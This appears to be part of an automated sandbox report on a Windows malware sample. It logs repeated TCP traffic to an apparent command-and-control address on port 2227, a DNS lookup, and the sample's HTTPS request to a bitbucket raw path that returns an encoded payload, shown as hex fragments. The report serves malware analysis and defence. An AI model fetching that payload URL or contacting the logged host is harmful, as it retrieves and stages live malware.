Jul 3, 2024 18:02:18.148180008 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.195909023 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.196047068 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.244076967 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.244287014 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.296009064 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.296148062 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.343902111 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.344152927 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.391963005 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.394059896 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.439845085 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.442090034 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.491934061 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.492079973 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.539887905 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.542081118 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.591913939 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.592077017 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.640122890 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.640217066 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.687982082 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.688055038 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.739921093 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.740124941 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.787894011 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.788503885 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.835880995 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.836540937 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.883853912 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.884675980 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.931907892 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.932506084 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.979896069 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.980191946 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.027915955 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.027961969 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.075949907 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.076020002 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.127949953 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.128062010 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.179799080 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.179919958 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.236052990 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.236105919 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.284065962 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.284136057 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.331939936 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.332078934 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.384383917 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.384516001 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.431982994 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.432104111 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.479963064 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.480073929 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.528281927 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.528428078 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.576214075 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.576317072 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.624176025 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.624272108 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.672027111 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.672135115 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.720232010 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.720336914 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.768106937 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.768158913 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.820543051 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.820599079 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.871917963 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.872045994 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.923906088 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.924026012 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:19.971965075 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:19.972104073 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.020036936 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.020195961 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.067899942 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.068006039 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.115921021 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.116048098 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.163933039 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.164074898 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.211914062 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.212060928 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.259951115 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.260085106 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.313441038 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.313621998 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.359998941 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.360085011 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.408094883 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.408191919 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.455996990 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.456151962 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.503948927 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.504014969 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.555893898 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.556130886 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.603852987 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.604574919 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.651957989 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.652184010 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.699933052 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.700061083 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.748174906 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.748301029 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.795944929 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.796036005 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.847955942 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.848234892 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.899907112 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.900008917 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.947930098 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.947990894 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:20.995898962 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:20.996037006 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.043931961 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.044018030 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.091937065 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.092057943 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.143855095 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.144020081 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.192017078 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.192137957 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.243949890 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.244096994 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.291874886 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.292051077 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.353106976 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.353287935 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.399847984 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.399923086 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.447895050 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.448018074 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.500612974 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.500699043 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.547907114 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.548122883 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.595907927 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.596014977 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.643907070 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.644031048 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.692095041 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.692444086 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.743978977 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.744132042 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.791912079 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.791985989 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.840145111 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.840289116 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.889456034 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.889585972 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.937273979 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.937520981 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:21.983915091 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:21.984021902 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:22.031914949 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:22.031996012 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:22.080465078 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:22.080535889 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:22.127916098 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:22.128068924 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:22.177383900 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:22.177537918 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:22.225140095 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:22.225265026 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:22.228907108 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:22.231328964 CEST	2227	49707	146.70.169.164	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 18:01:30.988043070 CEST	51880	53	192.168.2.7	1.1.1.1
Jul 3, 2024 18:01:30.996522903 CEST	53	51880	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 18:01:30.988043070 CEST	192.168.2.7	1.1.1.1	0x6a9a	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 18:01:30.996522903 CEST	1.1.1.1	192.168.2.7	0x6a9a	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49705	104.192.141.1	443	6500	C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 16:01:31 UTC	155	OUT	GET /fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee HTTP/1.1 Accept: / User-Agent: Chrome/95.0.4638.54 Host: bitbucket.org
2024-07-03 16:01:32 UTC	3109	IN	HTTP/1.1 200 OK server: envoy x-usage-quota-remaining: 998333.127 vary: Authorization, Accept-Language, Origin, Accept-Encoding x-usage-request-cost: 1686.10 Cache-Control: max-age=900 Content-Type: text/plain x-b3-traceid: c2264b093f093e7b x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 content-security-policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org .bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake. [TRUNCATED] Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Wed, 03 Jul 2024 16:01:31 GMT x-usage-user-time: 0.032528 x-usage-system-time: 0.000055 x-served-by: 823f7f7f59ff x-envoy-upstream-service-time: 77 content-language: en x-view-name: bitbucket.apps.repo2.views.filebrowse_raw x-b3-spanid: c2264b093f093e7b Accept-Ranges: bytes etag: "9cbc4bb3e3be8bf2d9cb84a3ea442b04" x-static-version: 6465b99ab21b x-render-time: 0.0680842399597168 Connection: close x-usage-input-ops: 72 last-modified: Wed, 03 Jul 2024 09:13:19 GMT x-version: 6465b99ab21b x-request-count: 3740 x-frame-options: SAMEORIGIN X-Cache-Info: caching Content-Length: 40280
2024-07-03 16:01:32 UTC	2823	IN	Data Raw: 74 76 51 71 7d 7d 2f 7d 7d 7d 7d 65 7d 7d 7d 7d 40 40 38 7d 7d 6c 47 7d 7d 7d 7d 7d 7d 7d 7d 7d 71 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 32 7d 7d 7d 7d 7d 34 46 55 47 34 7d 54 7d 4e 6e 69 42 47 7b 74 2f 30 48 76 7e 48 50 2d 59 7b 57 2d 4d 39 4e 2d 4d 66 54 69 7e 6e 48 42 4d 35 56 44 63 7b 49 3e 73 7b 59 44 77 34 47 3c 77 34 47 72 65 39 74 69 7e 31 56 3e 7e 75 55 64 71 30 6b 6a 7d 7d 7d 7d 7d 7d 7d 7d 7d 64 51 64 3c 65 65 52 4d 5a 70 76 36 35 53 5a 31 45 55 42 2f 39 78 5a 74 68 2f 76 51 58 53 5a 31 45 4e 66 66 58 78 50 77 5a 70 76 36 35 53 5a 4c 45 68 42 2f 39 78 57 64 68 7e 76 51 6e 53 5a 31 46 7d 2f 2d 31 77 52 32 5a 70 76 31 6a 50 7c 32 49 55 42 2f 39 Data Ascii: tvQq}}/}}}}e}}}}@@8}}lG}}}}}}}}}q}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}2}}}}}4FUG4}T}NniBG{t/0Hv~HP-Y{W-M9N-MfTi~nHBM5VDc{I>s{YDw4G<w4Gre9ti~1V>~uUdq0kj}}}}}}}}}dQd<eeRMZpv65SZ1EUB/9xZth/vQXSZ1ENffXxPwZpv65SZLEhB/9xWdh~vQnSZ1F}/-1wR2Zpv1jP\|2IUB/9
2024-07-03 16:01:32 UTC	10568	IN	Data Raw: 66 32 33 72 52 49 39 45 6c 59 21 4a 3e 69 47 7d 7d 48 2d 7b 30 78 52 4b 69 7d 47 7d 7d 36 6b 47 47 7d 7d 7d 70 54 57 33 71 48 65 7d 7d 49 40 7d 70 54 58 78 57 48 65 7d 7d 2f 38 7d 34 72 71 48 4d 49 75 77 57 4a 75 77 4b 64 30 78 72 64 37 46 6b 4a 71 58 6c 75 76 7b 4f 36 68 7b 7d 7d 66 42 4f 42 49 65 7d 7d 69 54 6e 38 69 56 74 3c 49 39 7c 76 4d 3c 6a 72 42 64 4f 65 49 4f 7d 7d 69 70 65 66 70 34 66 59 4f 72 7d 7d 69 56 6f 36 69 69 47 7d 7d 63 6c 59 21 48 37 69 7d 7d 7d 49 31 33 57 36 46 46 21 40 40 21 7b 40 4d 78 65 2f 77 48 31 42 4f 6e 4c 4d 7d 63 6e 72 46 73 64 3e 46 71 7d 4a 75 32 75 75 69 56 78 58 30 77 75 58 76 5a 7e 6b 21 4a 73 6b 57 7d 7d 49 40 7b 3e 48 46 3e 30 70 4f 56 78 49 38 37 4f 2f 59 69 7d 7d 69 78 7d 44 64 66 51 7d 69 56 77 64 37 2d 6e 38 69 Data Ascii: f23rRI9ElY!J>iG}}H-{0xRKi}G}}6kGG}}}pTW3qHe}}I@}pTXxWHe}}/8}4rqHMIuwWJuwKd0xrd7FkJqXluv{O6h{}}fBOBIe}}iTn8iVt<I9\|vM<jrBdOeIO}}ipefp4fYOr}}iVo6iiG}}clY!H7i}}}I13W6FF!@@!{@Mxe/wH1BOnLM}cnrFsd>Fq}Ju2uuiVxX0wuXvZ~k!JskW}}I@{>HF>0pOVxI87O/Yi}}ix}DdfQ}iVwd7-n8i
2024-07-03 16:01:32 UTC	5816	IN	Data Raw: 51 7d 7e 4f 7d 40 58 77 65 2d 65 7d 7d 49 75 78 2f 49 30 78 30 49 30 33 2f 3e 4f 54 2f 74 2d 3e 4d 49 71 49 6c 72 46 72 7d 71 69 4c 66 39 69 54 66 35 7d 6e 66 32 69 4c 66 35 6f 55 71 36 71 30 7b 7d 7d 63 64 46 45 57 7d 44 7b 6b 6c 72 45 5a 72 34 66 63 6c 76 2d 63 6c 74 46 74 4f 58 47 65 7d 7d 66 4d 6c 72 45 59 6c 74 46 73 6e 7b 65 7e 6a 72 46 74 50 35 7d 7d 7d 7d 69 54 66 53 69 70 47 7d 4e 72 2f 47 33 30 2f 7d 33 3e 7e 3c 4a 7b 7c 49 30 33 30 3e 4f 4b 7b 49 30 78 30 71 65 63 6a 72 46 73 6c 72 42 63 64 34 63 7b 30 7b 53 3e 66 40 31 4a 52 7b 2f 3e 66 40 33 48 4d 64 37 35 66 40 34 54 6e 39 7e 3c 6a 7d 7c 54 66 39 65 7b 7d 49 75 78 30 49 30 75 2f 73 65 49 6a 72 71 59 6c 72 45 58 69 73 69 4c 66 37 64 70 7d 71 7e 56 7d 7d 7d 21 21 72 7d 77 7c 47 40 47 54 44 72 Data Ascii: Q}~O}@Xwe-e}}Iux/I0x0I03/>OT/t->MIqIlrFr}qiLf9iTf5}nf2iLf5oUq6q0{}}cdFEW}D{klrEZr4fclv-cltFtOXGe}}fMlrEYltFsn{e~jrFtP5}}}}iTfSipG}Nr/G30/}3>~<J{\|I030>OK{I0x0qecjrFslrBcd4c{0{S>f@1JR{/>f@3HMd75f@4Tn9~<j}\|Tf9e{}Iux0I0u/seIjrqYlrEXisiLf7dp}q~V}}}!!r}w\|G@GTDr
2024-07-03 16:01:32 UTC	10568	IN	Data Raw: 40 40 21 53 74 40 33 78 38 49 5a 30 4f 2d 65 7d 7d 40 39 46 40 44 46 47 5a 39 4b 42 40 31 34 56 6c 36 6e 70 57 40 40 39 46 49 38 3e 45 77 34 56 4c 78 2d 6e 76 49 21 59 64 37 66 49 64 3e 46 7d 7d 49 30 30 69 36 70 40 37 40 40 38 70 54 53 63 64 21 7d 65 70 48 75 2f 63 7d 7d 63 35 63 7d 69 7d 7d 6f 48 30 38 70 40 40 49 75 78 34 47 33 33 34 7d 7d 21 65 6a 7d 69 7d 7d 70 39 31 63 7e 48 2f 44 75 7d 7d 40 33 78 34 36 65 40 58 40 40 21 64 58 7d 59 6c 76 46 49 6e 74 45 64 4f 4f 40 56 40 40 34 6e 4c 39 7d 7b 51 63 64 70 73 4a 75 33 4f 36 6b 46 57 40 40 39 3e 58 30 78 7d 7e 7d 7d 7d 7d 69 6e 4c 58 7d 64 68 72 2d 58 7d 7d 7d 7d 7d 4a 75 78 47 49 75 78 69 47 32 78 71 7d 69 6e 4c 31 7d 7b 4f 31 69 72 7d 7d 70 38 76 49 68 7b 7d 7d 7e 4f 63 77 7e 56 7d 7d 7d 21 33 47 2f Data Ascii: @@!St@3x8IZ0O-e}}@9F@DFGZ9KB@14Vl6npW@@9FI8>Ew4VLx-nvI!Yd7fId>F}}I00i6p@7@@8pTScd!}epHu/c}}c5c}i}}oH08p@@Iux4G334}}!ej}i}}p91c~H/Du}}@3x46e@X@@!dX}YlvFIntEdOO@V@@4nL9}{QcdpsJu3O6kFW@@9>X0x}~}}}}inLX}dhr-X}}}}}JuxGIuxiG2xq}inL1}{O1ir}}p8vIh{}}~Ocw~V}}}!3G/
2024-07-03 16:01:32 UTC	5816	IN	Data Raw: 58 49 76 78 38 76 34 54 39 64 69 70 64 7b 4f 4c 31 21 69 54 6c 21 4f 4c 44 63 69 56 3e 47 45 70 40 40 33 38 7d 57 45 4b 78 49 76 33 30 49 75 33 53 48 44 53 70 48 64 75 7b 7d 7d 63 64 21 57 71 70 47 52 69 7d 7d 7d 63 6c 57 38 68 4f 7d 4f 4c 66 38 7d 21 32 66 34 54 66 64 69 54 6e 40 7d 21 32 44 57 65 70 54 4e 38 63 64 37 3e 7c 7d 57 21 32 48 7b 65 7d 7b 71 7d 7d 49 58 73 72 49 30 33 34 75 6f 49 6a 39 56 40 40 49 30 33 34 36 6a 4e 32 40 40 21 6c 74 46 57 70 54 4f 71 58 7d 7d 75 7d 7d 69 53 75 53 7c 54 31 21 69 56 6f 75 6f 48 4f 39 56 40 40 49 38 37 4f 45 46 42 40 40 34 54 6e 40 7d 21 32 48 64 4b 7d 7b 71 7d 7d 49 58 73 35 49 38 35 71 36 65 56 32 40 40 21 6c 5a 55 48 2d 39 56 40 40 49 30 33 38 64 37 3c 65 7e 71 7d 66 7d 7d 63 6c 66 6a 4d 6c 5a 4c 64 4f 6c 56 Data Ascii: XIvx8v4T9dipd{OL1!iTl!OLDciV>GEp@@38}WEKxIv30Iu3SHDSpHdu{}}cd!WqpGRi}}}clW8hO}OLf8}!2f4TfdiTn@}!2DWepTN8cd7>\|}W!2H{e}{q}}IXsrI034uoIj9V@@I0346jN2@@!ltFWpTOqX}}u}}iSuS\|T1!iVouoHO9V@@I87OEFB@@4Tn@}!2HdK}{q}}IXs5I85q6eV2@@!lZUH-9V@@I038d7<e~q}f}}clfjMlZLdOlV
2024-07-03 16:01:32 UTC	4689	IN	Data Raw: 6b 7d 7d 7d 54 69 66 3e 50 3e 7e 76 56 71 77 72 48 2d 68 72 4c 2d 49 7d 4a 6a 77 71 36 69 63 76 5a 64 71 4f 7d 7d 7d 7d 7d 6c 73 7b 70 2d 7e 76 59 7c 78 72 50 42 32 35 74 45 78 6e 30 3e 77 30 36 69 63 76 4b 6f 49 76 4b 6f 49 76 4b 64 71 4f 7d 7d 7d 7d 54 69 66 76 5a 3e 78 6a 7b 3e 32 76 55 44 64 4f 47 6a 78 2f 6e 63 47 7d 7d 7d 63 71 7d 3e 7d 7d 55 7d 7e 57 7d 42 57 7b 4e 7d 7d 7d 7d 7d 7d 7d 4f 42 4e 76 53 42 63 4b 7d 7d 63 47 7d 42 47 7b 31 7d 7e 57 7d 42 7d 7d 50 7d 7d 7d 7d 7d 7d 7d 57 2f 74 69 5a 6e 64 75 32 6e 5a 47 35 71 75 6a 64 72 65 76 7e 7d 7d 7d 7d 7d 64 7d 58 2f 4a 2f 30 6e 74 7c 33 6f 64 4c 48 7c 4d 6e 4b 3e 77 7c 7d 7d 7d 7d 7d 72 47 7b 50 7d 7e 57 7d 3e 71 7d 7d 7d 7d 7d 7d 78 7d 7b 6f 7d 7e 75 7d 44 7d 7b 33 7d 7e 38 7d 2d 47 7b 52 7d 66 Data Ascii: k}}}Tif>P>~vVqwrH-hrL-I}Jjwq6icvZdqO}}}}}ls{p-~vY\|xrPB25tExn0>w06icvKoIvKoIvKdqO}}}}TifvZ>xj{>2vUDdOGjx/ncG}}}cq}>}}U}~W}BW{N}}}}}}}OBNvSBcK}}cG}BG{1}~W}B}}P}}}}}}}W/tiZndu2nZG5qujdrev~}}}}}d}X/J/0nt\|3odLH\|MnK>w\|}}}}}rG{P}~W}>q}}}}}}x}{o}~u}D}{3}~8}-G{R}f

Target ID:	0
Start time:	12:00:33
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
Wow64 process (32bit):	true
